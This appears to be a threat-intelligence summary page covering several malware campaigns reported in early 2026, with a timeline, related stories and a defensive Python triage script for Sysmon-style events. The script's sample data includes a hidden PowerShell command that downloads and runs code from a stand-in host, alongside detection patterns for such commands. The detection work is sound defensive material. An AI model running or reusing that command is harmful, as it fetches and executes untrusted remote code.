Multiple Malware Campaigns Abuse Phishing and Legitimate Cloud Services to Compromise Windows and Linux Systems
Reporting describes several unrelated but contemporaneous malware operations targeting both Windows and Linux environments. In Taiwan, FortiGuard Labs observed targeted phishing using tax and e-invoice lures to deliver Winos 4.0 (ValleyRat) and plugins, with delivery chains including malicious .LNK files, DLL sideloading, and BYOVD using the vulnerable driver wsftprm.sys, supported by rapidly rotating domains and cloud-hosted infrastructure that reduces the effectiveness of static blocklists. Separately, Cato CTRL reported a new Windows loader, Foxveil, that stages and retrieves shellcode via trusted platforms (Cloudflare Pages, Netlify, and Discord attachments) and executes payloads using techniques including Early Bird APC injection (often into a fake svchost.exe) or self-injection, while persisting via Windows services or masqueraded binaries dropped into SysWOW64.
Additional reporting covers distinct campaigns in other regions and platforms. A LATAM-focused intrusion chain uses fake bank receipt lures (double-extension such as .pdf.js) to deliver XWorm v5.6, employing oversized/obfuscated JavaScript, WMI-based process creation (Win32_Process) to launch hidden PowerShell, and abuse of a hardcoded Cloudinary URL for staging—capabilities consistent with credential theft and enabling follow-on ransomware. Trellix analysis described a separate Monero cryptomining operation distributed via pirated software installers that propagates through USB/external drives to reach even air-gapped systems, using multi-component “watchdog” self-healing behavior and aggressive defense-evasion. On Linux, LevelBlue detailed a new SysUpdate variant (packed ELF64) that performs host reconnaissance and uses strong C2 encryption; researchers built a Unicorn Engine-based emulation tool to reproduce key generation/encryption routines and decrypt captured C2 traffic for investigation and detection engineering.
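The delivery chains in the two paragraphs above (the fake svchost.exe injection target and SysWOW64 masquerading used by Foxveil, the BYOVD driver named in the Winos reporting, and the .pdf.js dropper that launches hidden PowerShell through WMI in the XWorm chain) all surface as process-tree and driver-load signals. The block below is an added example written for this page, not code from FortiGuard Labs, Cato CTRL, or any of the other cited teams. It runs four triage rules over constructed Sysmon-style JSON records; the field names follow Sysmon Event ID 1 (ProcessCreate) and Event ID 6 (DriverLoad), while the file names, PIDs, and the `example.invalid` URL are assumptions made for the sample data.

```python
"""Process-creation and driver-load triage for the delivery chains described above.

Added example, not code from any of the cited reports. It runs over constructed
Sysmon-style records (JSON lines, built inline below) and flags four behaviours:
a script host launching a double-extension file such as .pdf.js, WmiPrvSE.exe
(the provider host that appears as parent when Win32_Process.Create is used)
spawning hidden or encoded PowerShell, a process named svchost.exe running
outside the Windows system directories, and a load of one of the vulnerable
drivers named in the reporting (wsftprm.sys, WinRing0x64.sys).
"""
import json
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Driver file names come from the reporting; a production rule keys on hashes/signers.
KNOWN_BAD_DRIVERS = {"wsftprm.sys", "winring0x64.sys"}
# A document-looking extension immediately followed by a Windows Script Host extension.
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|jpe?g|png)\.(?:js|jse|vbs|vbe|wsf|hta)\b", re.I)
# -WindowStyle Hidden (PowerShell accepts any unique prefix of the switch) or -EncodedCommand.
HIDDEN_OR_ENCODED = re.compile(r"-w[a-z]*\s+hidden|-e[a-z]*\s+[A-Za-z0-9+/=]{16,}", re.I)


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _dir(path):
    return path.rsplit("\\", 1)[0].lower() if "\\" in path else ""


def triage(event):
    """Return the rule names a single event trips (empty list if benign)."""
    hits = []
    if event.get("EventID") == 6:  # Sysmon DriverLoad
        if _base(event.get("ImageLoaded", "")) in KNOWN_BAD_DRIVERS:
            hits.append("vulnerable-driver-load")
        return hits
    image, parent, cmd = (event.get(k, "") for k in ("Image", "ParentImage", "CommandLine"))
    if _base(image) in SCRIPT_HOSTS and DOUBLE_EXT.search(cmd):
        hits.append("script-host-double-extension")
    if _base(image) in POWERSHELL and _base(parent) == "wmiprvse.exe" and HIDDEN_OR_ENCODED.search(cmd):
        hits.append("wmi-spawned-hidden-powershell")
    if _base(image) == "svchost.exe" and _dir(image) not in SYSTEM_DIRS:
        hits.append("svchost-outside-system-dir")
    return hits


def scan(jsonl):
    """Return [(ProcessId or ImageLoaded, rule), ...] for every record that trips a rule."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        key = ev.get("ProcessId", ev.get("ImageLoaded"))
        findings.extend((key, rule) for rule in triage(ev))
    return findings


# Constructed sample telemetry (not captured data): one benign and one suspicious case per rule.
SAMPLE_EVENTS = r'''
{"EventID": 1, "ProcessId": 4001, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\notepad.exe\" notes.txt"}
{"EventID": 1, "ProcessId": 4412, "Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\wscript.exe\" \"C:\\Users\\ana\\Downloads\\comprovante.pdf.js\""}
{"EventID": 1, "ProcessId": 5120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "powershell.exe -w hidden -nop -c \"iex(irm https://example.invalid/s)\""}
{"EventID": 1, "ProcessId": 5200, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoLogo"}
{"EventID": 1, "ProcessId": 6001, "Image": "C:\\Users\\ana\\AppData\\Local\\Temp\\svchost.exe", "ParentImage": "C:\\Users\\ana\\AppData\\Roaming\\updater.exe", "CommandLine": "svchost.exe"}
{"EventID": 1, "ProcessId": 900, "Image": "C:\\Windows\\System32\\svchost.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs"}
{"EventID": 6, "ImageLoaded": "C:\\Windows\\Temp\\wsftprm.sys", "Signed": "true"}
'''

if __name__ == "__main__":
    for key, rule in scan(SAMPLE_EVENTS):
        print(f"{rule:32} {key}")
```

The svchost.exe rule deliberately checks the image directory rather than the parent process, because the Foxveil reporting describes both a fake svchost.exe as an injection target and lookalike binaries dropped into SysWOW64; a copy placed inside SysWOW64 would pass this rule and needs a signer or hash check on top. Likewise the driver rule matches on file name only because that is all the reporting names; in production, key the rule on the driver's hash or signing certificate so a renamed copy is still caught.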
Timeline
Feb 20, 2026
FortiGuard attributes Taiwan Winos activity to Silver Fox subgroup
FortiGuard attributed the Taiwan-focused Winos 4.0 campaigns with high confidence to a specialized subgroup within the Silver Fox APT. The attribution was based on overlapping infrastructure, identical driver-abuse techniques, domain registration artifacts, and a recurring development MachineID.
Feb 20, 2026
FortiGuard reports Winos 4.0 phishing campaigns targeting Taiwan
FortiGuard Labs disclosed targeted phishing campaigns in Taiwan using tax-themed lures to deliver Winos 4.0 (ValleyRat) and follow-on plugins. The campaigns use rotating domains, cloud-hosted archives, DLL sideloading, UAC bypass, and a vulnerable driver to disable security products and run memory-resident modules.
Feb 19, 2026
Researchers disclose advanced air-gap-bridging cryptomining malware
Trellix publicly described the cryptomining campaign's controller/payload separation, BYOVD privilege escalation, and CPU register tampering to improve Monero RandomX mining performance by an estimated 15–50%. The report also highlighted its ability to spread through removable media and bridge air-gapped systems.
Feb 19, 2026
XWorm campaign targets Latin American businesses with fake receipts
Researchers reported a multi-stage campaign targeting Brazilian and broader Latin American businesses with fake Bradesco bank receipt lures delivering XWorm v5.6. The infection chain uses a .pdf.js dropper, Cloudinary-hosted steganographic content, in-memory .NET loading, scheduled-task persistence, and CasPol.exe injection.
Feb 18, 2026
Researchers develop tool to decrypt SysUpdate Linux C2 traffic
To analyze the new SysUpdate variant, researchers built a Unicorn Engine-based emulation toolchain that reproduces the malware's key generation and decryption routines. The method enables defenders to decrypt intercepted C2 traffic from this and future variants by extracting updated keys from memory.
Feb 18, 2026
LevelBlue discovers new Linux SysUpdate variant
During a DFIR engagement, analysts found a suspicious packed ELF64 binary in a client environment and attributed it with high confidence to a new Linux-targeting SysUpdate variant. The malware masquerades as a system service, performs reconnaissance, and establishes encrypted multi-protocol C2 communications.
Feb 18, 2026
Researchers report Foxveil and its two variants
Security researchers publicly reported the newly discovered Foxveil loader and described two variants that differ in shellcode execution and injection methods. They also documented persistence via Windows services or lookalike executables in SysWOW64 and a runtime string-mutation feature to hinder analysis.
Dec 23, 2025
Cryptomining malware reaches built-in cleanup date
The cryptomining malware contains a hardcoded check for December 23, 2025, after which it switches to a cleanup mode that terminates components and deletes dropped files. This suggests the operators planned a defined campaign lifecycle.
Nov 1, 2025
Trellix identifies USB-spreading cryptomining campaign
Trellix said it identified a multi-stage cryptomining campaign in late 2025 that propagates through USB and external drives, including into air-gapped environments. The malware uses watchdog processes, kills security tools, and leverages the vulnerable WinRing0x64.sys driver for kernel access.
Aug 1, 2025
Foxveil malware loader activity begins
Cato CTRL assessed that the previously undocumented Foxveil malware loader has been active since August 2025. The loader abuses Cloudflare Pages, Netlify, and Discord attachments to stage shellcode and evade reputation-based defenses.
Related Stories

Credential-Theft Malware Campaigns Targeting Windows via Social Engineering and Trusted Services
Multiple reports describe **active malware campaigns targeting Windows users** with a focus on **credential, session, and wallet theft** delivered through social engineering and abuse of legitimate services. **CharlieKirk Grabber**, a Python infostealer packaged with *PyInstaller*, is distributed via phishing, cracked software, cheats, and social-media lures; it kills browser processes (via `TASKKILL`) to access credential stores, collects passwords/cookies/autofill/Wi‑Fi data, zips the loot, uploads it to *GoFile*, and relays the download link to operators via **Discord webhooks** or **Telegram bots**. Separately, attackers are buying **Facebook ads** impersonating Microsoft to drive victims to cloned Windows 11 download pages on lookalike domains (e.g., `ms-25h2-update[.]pro`), delivering a malicious installer that steals saved passwords, browser sessions, and **cryptocurrency wallet** data; the campaign uses **geofencing/sandbox evasion** to show benign content to data-center IPs while serving malware to likely end users.

Other contemporaneous activity highlights broader Windows-targeted intrusion tradecraft and adjacent threats. FortiGuard Labs reported **Winos 4.0 (ValleyRat)** phishing campaigns in Taiwan using tax and e-invoice lures, with delivery chains including malicious **LNK** downloaders, **DLL sideloading**, and **BYOVD** using the vulnerable driver `wsftprm.sys`, supported by rapidly rotating domains and cloud hosting. In LATAM, a fake bank-receipt lure delivers **XWorm v5.6** via a `.pdf.js` double-extension WSH dropper that uses junk-padding and Unicode obfuscation, then reconstructs and runs PowerShell (spawned via WMI) and abuses trusted hosting (e.g., Cloudinary) for later stages, enabling credential theft and potential ransomware follow-on.
Additional reporting covered a USB-propagating **Monero cryptomining** operation capable of crossing air-gapped environments, a new Linux **SysUpdate** variant with encrypted C2 traffic (and a Unicorn Engine-based decryption approach developed during DFIR), and the **Foxveil** loader abusing **Cloudflare Pages, Netlify, and Discord** to stage shellcode and persist via services or *SysWOW64* masquerading—these are separate threats but reinforce the trend of attackers blending into trusted infrastructure and common user workflows.
1 month ago
Multiple APT and malware campaigns abusing phishing, cloud services, and signed binaries
Reporting across multiple research teams described a surge of distinct, ongoing intrusion campaigns rather than a single unified incident. **Check Point** reported on **Silver Dragon**, a Chinese-aligned activity cluster assessed as operating under the broader **APT41** umbrella, targeting organizations in **Southeast Asia and Europe** (notably government) via exploitation of public-facing servers and phishing, then deploying **Cobalt Strike**, **DNS tunneling**, and a new Google Drive–based backdoor (**GearDoor**) alongside custom tools (**SSHcmd** and **SliverScreen**) for remote access and screen capture. **Microsoft** detailed separate February 2026 phishing campaigns by an unknown actor that used meeting/invoice-style lures and **EV code-signed** malware (certificate issued to **TrustConnect Software PTY LTD**) masquerading as common workplace apps (e.g., `msteams.exe`, `adobereader.exe`, `zoomworkspace.clientsetup.exe`) to install legitimate **RMM** tooling (**ScreenConnect**, **Tactical RMM**, **Mesh Agent**) for persistent access and lateral movement. Other reporting highlighted additional, unrelated campaigns and tradecraft: **ClearSky** described a Russian-aligned operation targeting **Ukraine** using a phishing-delivered ZIP/HTA chain that drops a .NET loader (**BadPaw**) and backdoor (**MeowMeow**) with **.NET Reactor** obfuscation, parameter-gated execution, and sandbox/tooling checks (with low-confidence linkage to **APT28**). **Cofense**-reported activity (via SC Media) showed phishing that weaponizes **Windows File Explorer + WebDAV** using URL/LNK shortcuts to pull payloads (notably **AsyncRAT**, **XWorm**, **DcRAT**) and infrastructure including **Cloudflare Tunnel** domains hosting WebDAV servers. 
**Cisco Talos**-reported **Dohdoor** activity (UAT-10027) targeted US **education and healthcare**, using PowerShell→batch→DLL sideloading via legitimate executables (e.g., `Fondue.exe`, `mblctr.exe`, `ScreenClippingHost.exe`) and **DNS-over-HTTPS** to Cloudflare for C2 discovery and tunneling. Separately, **Zscaler** reported **ScarCruft**’s *Ruby Jumper* campaign using **Zoho WorkDrive** for C2 and removable media components to reach air-gapped systems, while another Zscaler report analyzed **Dust Specter** targeting Iraqi government officials with password-protected RAR delivery and modular implants. **Qianxin XLab** assessed sanctioned infrastructure provider **Funnull** resurfacing to support scam/criminal supply chains and potential **MacCMS**-related supply-chain activity, and **F5 Labs** summarized **APT42**’s **TAMECAT** PowerShell backdoor focused on Edge/Chrome credential theft with C2 over Telegram/Discord/HTTPS and specific file/hash indicators. (A separate Help Net Security item on a Microsoft Defender onboarding tool is product/administrative news and not part of the threat-campaign reporting.)
1 month ago
Windows Malware Campaigns Abusing Trusted Tools and Cloud Hosting for Stealthy Execution
Multiple Windows-focused malware campaigns were reported leveraging *trusted distribution and execution paths* rather than exploiting software vulnerabilities. One campaign attributed to **Larva-25012** disguised proxyware as legitimate *Notepad++* installers distributed via fake cracked-software portals and deceptive ads, primarily impacting South Korea. The payloads were hosted on GitHub and delivered as MSI/ZIP packages containing legitimate components plus malicious DLLs, using **DLL side-loading** and process injection into **Windows Explorer** to deploy proxyware (e.g., **Infatica** and **DigitalPulse**) for **proxyjacking**—monetizing victims’ internet bandwidth by reselling access through their networks. A separate multi-stage Windows malware operation used business-themed lures and weaponized archives containing **LNK** shortcuts to run hidden **PowerShell** with execution-policy bypass, pulling an obfuscated loader from GitHub and using legitimate services (e.g., **Dropbox**) to blend into normal traffic. Fortinet-reported tradecraft included persistence, decoy document generation, and beaconing via the **Telegram Bot API**, followed by defense evasion through abuse of **Defendnot** to disable Microsoft Defender before dropping follow-on payloads such as ransomware, banking trojans, and surveillance tooling. Additional reporting highlighted a broader trend of attackers abusing legitimate infrastructure and admin tooling (including **RMM** software after credential theft) to establish persistent access, while generic “common threats” content provided no incident-specific intelligence.
1 month ago